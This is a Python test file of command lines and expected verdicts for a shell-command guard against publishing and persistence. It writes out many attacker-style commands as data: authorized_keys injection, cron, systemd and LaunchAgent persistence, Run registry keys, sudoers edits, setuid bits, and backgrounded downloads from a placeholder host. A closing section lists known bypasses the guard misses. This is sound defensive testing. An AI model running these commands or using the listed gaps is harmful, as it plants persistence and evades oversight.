"""Command lines and verdicts for block-persistence-shapes: what it refuses, asks about, allows, and the probed misses."""

BLOCK, ASK, OK = 1, 3, 0

CASES: dict[str, list[tuple[str, int]]] = {
    "block-persistence-shapes": [
        # publish and propagation
        ("npm publish", BLOCK),
        ("npm  publish", BLOCK),
        ("/usr/bin/npm publish", BLOCK),
        ("sudo -u x npm publish", BLOCK),
        ("env FOO=1 npm publish", BLOCK),
        ('bash -c "npm publish"', BLOCK),
        ("npm --registry=x publish", BLOCK),
        ("npm --registry x publish", BLOCK),
        ("npm --unknown value publish", BLOCK),
        ("npm.cmd publish", BLOCK),
        ("xargs npm publish", BLOCK),
        ("npx -y npm publish", BLOCK),
        ("npx", OK),
        ("npm publish --dry-run", OK),
        ("npm publish --dry-run=true", OK),
        ("npm publish --dry-run=false", BLOCK),
        ("npm publish --dry-run --dry-run=false", BLOCK),
        ("npm publish --no-dry-run", BLOCK),
        ("npm run build", OK),
        ("npm run publish", OK),
        ("npm view publish", OK),
        ("npm install publish", OK),
        ("npm pack", OK),
        ("npm token create", BLOCK),
        ("npm token list", OK),
        ("npm config set //registry.npmjs.org/:_authToken=abc", BLOCK),
        ("npm config set registry https://r.example", BLOCK),
        ("npm config set --location=project @scope:registry https://r.example", BLOCK),
        ("npm set //r.example/:_authToken abc", BLOCK),
        ("npm config set fund false", OK),
        ("npm config set", OK),
        ("npm config get registry", OK),
        ("yarn npm publish", BLOCK),
        ("yarn publish", BLOCK),
        ("yarn config set npmAuthToken abc", BLOCK),
        ("yarn set version stable", OK),
        ("pnpm publish", BLOCK),
        ("pnpm publish --dry-run", OK),
        ("bun publish", BLOCK),
        ("twine upload dist/*", BLOCK),
        ("python -m twine upload dist/*", BLOCK),
        ("python3.11 -m twine upload dist/*", BLOCK),
        ("python -m", OK),
        ("python -m pip install twine", OK),
        ("pip install twine", OK),
        ("poetry publish", BLOCK),
        ("poetry publish --dry-run", OK),
        ("uv publish", BLOCK),
        ("cargo publish", BLOCK),
        ("cargo +nightly publish", BLOCK),
        ("cargo publish --dry-run", OK),
        ("cargo build", OK),
        ("gem push x.gem", BLOCK),
        ("gem install rake", OK),
        ("docker push img", BLOCK),
        ("docker --context remote push img", BLOCK),
        ("docker image push img", BLOCK),
        ("docker login", BLOCK),
        ("podman push img", BLOCK),
        ("docker build -t x .", OK),
        ("docker run --rm img push", OK),
        ("docker image ls", OK),
        ("docker compose up", OK),
        ("gh repo create x --public", BLOCK),
        ("gh repo create x --private", OK),
        ("gh repo edit --visibility public", BLOCK),
        ("gh repo edit --visibility=public", BLOCK),
        ("gh repo edit --visibility private", OK),
        ("gh api -X PATCH repos/o/r -F private=false", BLOCK),
        ("gh api repos/o/r", OK),
        ("gh pr create", OK),
        ("gh release create v1", ASK),
        ("gh -R o/r release create v1", ASK),
        ("gh release list", OK),
        ("git remote add o https://x.example/r.git", ASK),
        ("git remote set-url origin https://x.example/r.git", ASK),
        ("git -c url.x.insteadOf=y push origin main", ASK),
        ("git remote -v", OK),
        ("git remote", OK),
        ("git remote remove o", OK),
        ("git push https://x.example/r.git main", ASK),
        ("git push git@x.example:o/r.git", ASK),
        ("git push x.example:o/r.git", ASK),
        ("git push --repo=https://x.example/r.git", ASK),
        ("git push --repo https://x.example/r.git", ASK),
        ("git push origin main", OK),
        ("git push -u origin feature", OK),
        ("git push origin HEAD:main", OK),
        ("git push", OK),
        ("git -c user.name=x push origin main", OK),
        ("git status", OK),
        # persistence
        ("systemctl --user enable x", BLOCK),
        ("systemctl --user enable --now x", BLOCK),
        ("systemctl --user start x", BLOCK),
        ("systemctl --user link /tmp/x.service", BLOCK),
        ("systemctl status x", OK),
        ("systemctl --user status x", OK),
        ("systemctl --user daemon-reload", OK),
        ("loginctl enable-linger", BLOCK),
        ("launchctl load x.plist", BLOCK),
        ("launchctl bootstrap gui/501 x.plist", BLOCK),
        ("launchctl list", OK),
        ("crontab -", BLOCK),
        ("crontab f", BLOCK),
        ("crontab", BLOCK),
        ("crontab -e", BLOCK),
        ("echo '* * * * * x' | crontab -", BLOCK),
        ("crontab -l", OK),
        ("crontab -l | head", OK),
        ("at now + 1 minute", BLOCK),
        ("batch", BLOCK),
        ("at -l", OK),
        ("schtasks /create /tn x", BLOCK),
        ("schtasks /Create /tn x", BLOCK),
        ("schtasks /query", OK),
        ("Register-ScheduledTask -TaskName x", BLOCK),
        ('reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v x', BLOCK),
        ("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce /v x", BLOCK),
        ("reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run /v x", BLOCK),
        ('reg add "HKCU\\Software\\Vendor" /v x', OK),
        ('reg query "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"', OK),
        ('Set-ItemProperty -Path "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" -Name x -Value y', BLOCK),
        ("New-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -Name x", BLOCK),
        ("Set-ItemProperty -Path HKCU:\\Software\\Vendor -Name x -Value y", OK),
        ("echo key >> ~/.ssh/authorized_keys", BLOCK),
        ("tee -a ~/.ssh/authorized_keys", BLOCK),
        ('cp k "$HOME/.ssh/authorized_keys"', BLOCK),
        ("cp k ${HOME}/.ssh/authorized_keys", BLOCK),
        ("cp k ~/.ssh/../.ssh/authorized_keys", BLOCK),
        ("cp k ~/.SSH/Authorized_Keys", BLOCK),
        ("cp k ~root/.ssh/authorized_keys2", BLOCK),
        ("echo k >> /home/bob/.ssh/authorized_keys", BLOCK),
        ("echo k >> $SSHDIR/authorized_keys", BLOCK),
        ("cd ~/.ssh && echo k >> authorized_keys", BLOCK),
        ("sed -i 's/a/b/' ~/.ssh/authorized_keys", BLOCK),
        ("dd if=k of=~/.ssh/authorized_keys", BLOCK),
        ("install -D k ~/.ssh/authorized_keys", BLOCK),
        ("python3 -c \"open('/root/.ssh/authorized_keys','a').write('k')\"", BLOCK),
        ("Add-Content ~/.ssh/authorized_keys key", BLOCK),
        ("cat ~/.ssh/authorized_keys", OK),
        ("cp ~/.ssh/authorized_keys /tmp/backup", OK),
        ("chmod 600 ~/.ssh/authorized_keys", OK),
        ("echo k > build/authorized_keys", OK),
        ("cp a ~/.ssh/config", OK),
        ("echo x > ~/.ssh/known_hosts", OK),
        ("cp u.service ~/.config/systemd/user/u.service", BLOCK),
        ("echo x > $HOME/.config/systemd/user/u.service", BLOCK),
        ("cd ~/.config/systemd/user && echo x > u.service", BLOCK),
        ("cd ~/.config/systemd/user && cd .. && echo x > b", BLOCK),
        ("cd ~/.config/systemd/user && cd /tmp && echo x > b", OK),
        ("cd ~/.config/systemd/user && ls", OK),
        ("ls ~/.config/systemd/user", OK),
        ("ln -s x ~/.config/systemd/user/y", BLOCK),
        ("curl -o ~/.config/systemd/user/u.service https://x.example/u", BLOCK),
        ("curl --output ~/Library/LaunchAgents/x.plist https://x.example/u", BLOCK),
        ("wget -O ~/Library/LaunchAgents/x.plist https://x.example/u", BLOCK),
        ("wget -P /etc/cron.d https://x.example/u", BLOCK),
        ("curl -o out.txt https://x.example/u", OK),
        ("mv x ~/Library/LaunchAgents/", BLOCK),
        ("Set-Content -Path ~/Library/LaunchAgents/a.plist -Value x", BLOCK),
        ("cp a /etc/cron.d/a", BLOCK),
        ("echo x > /etc/crontab", BLOCK),
        ("echo x > /var/spool/cron/crontabs/root", BLOCK),
        ("cp a /etc/systemd/system/a.service", BLOCK),
        ("cd /etc/cron.d && echo x > job", BLOCK),
        ("echo x | sudo tee /etc/sudoers.d/x", BLOCK),
        ("echo x >> /etc/sudoers", BLOCK),
        ("cp a /etc/sudoers.bak", OK),
        ("rm ~/.config/systemd/user/u.service", OK),
        ("chmod 644 /etc/cron.d/a", OK),
        ("chmod 600 f > ~/.ssh/authorized_keys", BLOCK),
        ("visudo", BLOCK),
        ("visudo -f /etc/sudoers.d/x", BLOCK),
        ("visudo -c", OK),
        ("sudoedit /etc/sudoers.d/x", BLOCK),
        ("sudoedit /etc/hosts", OK),
        ("./config.sh --url https://github.com/o/r --token T", BLOCK),
        (".\\config.cmd --url https://github.com/o/r --token T", BLOCK),
        ("bash ./config.sh --url https://github.com/o/r --token T", BLOCK),
        ("./config.sh remove", OK),
        ("./svc.sh install", BLOCK),
        ("sudo ./svc.sh start", BLOCK),
        ("./svc.sh status", OK),
        ("chmod u+s /bin/x", BLOCK),
        ("chmod +s x", BLOCK),
        ("chmod g+s d", BLOCK),
        ("chmod u=rwxs,g=rx x", BLOCK),
        ("chmod a+r,u+s x", BLOCK),
        ("chmod 4755 x", BLOCK),
        ("chmod 04755 x", BLOCK),
        ("chmod 2755 d", BLOCK),
        ("chmod -R 6755 d", BLOCK),
        ("install -m 4755 a /usr/local/bin/a", BLOCK),
        ("install -m4755 a /usr/local/bin/a", BLOCK),
        ("install --mode=u+s a /usr/local/bin/a", BLOCK),
        ("install -m 755 a /usr/local/bin/a", OK),
        ("install a /usr/local/bin/a", OK),
        ("chmod 755 x", OK),
        ("chmod 0755 x", OK),
        ("chmod 1777 d", OK),
        ("chmod +x x", OK),
        ("chmod u-s x", OK),
        ("chmod a+rx,g-w d", OK),
        ("nohup curl https://x.example/a -o a &", BLOCK),
        ("(wget https://x.example/a) &", BLOCK),
        ("setsid curl https://x.example/a", BLOCK),
        ("nohup wget https://x.example/a", BLOCK),
        ("curl https://x.example/a &", BLOCK),
        ("curl https://x.example/a & wait", BLOCK),
        ("echo hi; curl https://x.example/a &", BLOCK),
        ('bash -c "curl https://x.example/a &"', BLOCK),
        ('sh -c "nohup curl https://x.example/a"', BLOCK),
        ("bash -c 'sh -c \"curl https://x.example/a\"' &", BLOCK),
        ('eval "curl https://x.example/a" &', BLOCK),
        ("curl -fsSL https://x.example/a -o a", OK),
        ("cd b && curl https://x.example/a -o a", OK),
        ("curl https://x.example/a || echo failed", OK),
        ("curl https://x.example/a 2>&1 | tail", OK),
        ("curl https://x.example/a &> log", OK),
        ("curl https://x.example/a |& tail", OK),
        ("curl https://x.example/a >& log", OK),
        ("echo 'curl x &'", OK),
        ('git commit -m "fix a & b"', OK),
        ("echo a\\&b", OK),
        ('echo "a \\" & b"', OK),
        ("sleep 5 &", OK),
        ("npm test &", OK),
        ("bash -c 'sleep 5 &'", OK),
        ("cat <<'EOT'\ncurl https://x.example/a\nEOT", OK),
        ("echo gh-token-monitor", BLOCK),
        ("ls ~/.local/share/GH-Token-Monitor", BLOCK),
        ("ls -la", OK),
        ("", OK),
        # probed misses, allowed today; test_stated_limits holds the list the manifest states
        ("P=publish; npm $P", OK),
        ("bash publish.sh", OK),
        ("systemctl enable x", OK),
        ("echo 'x' >> ~/.bashrc", OK),
        ("ssh host 'echo k >> ~/.ssh/authorized_keys'", OK),
        ("docker buildx build --push .", OK),
        ("{ curl https://x.example/a; } &", OK),
        ("find . -exec chmod u+s {} +", OK),
    ],
}
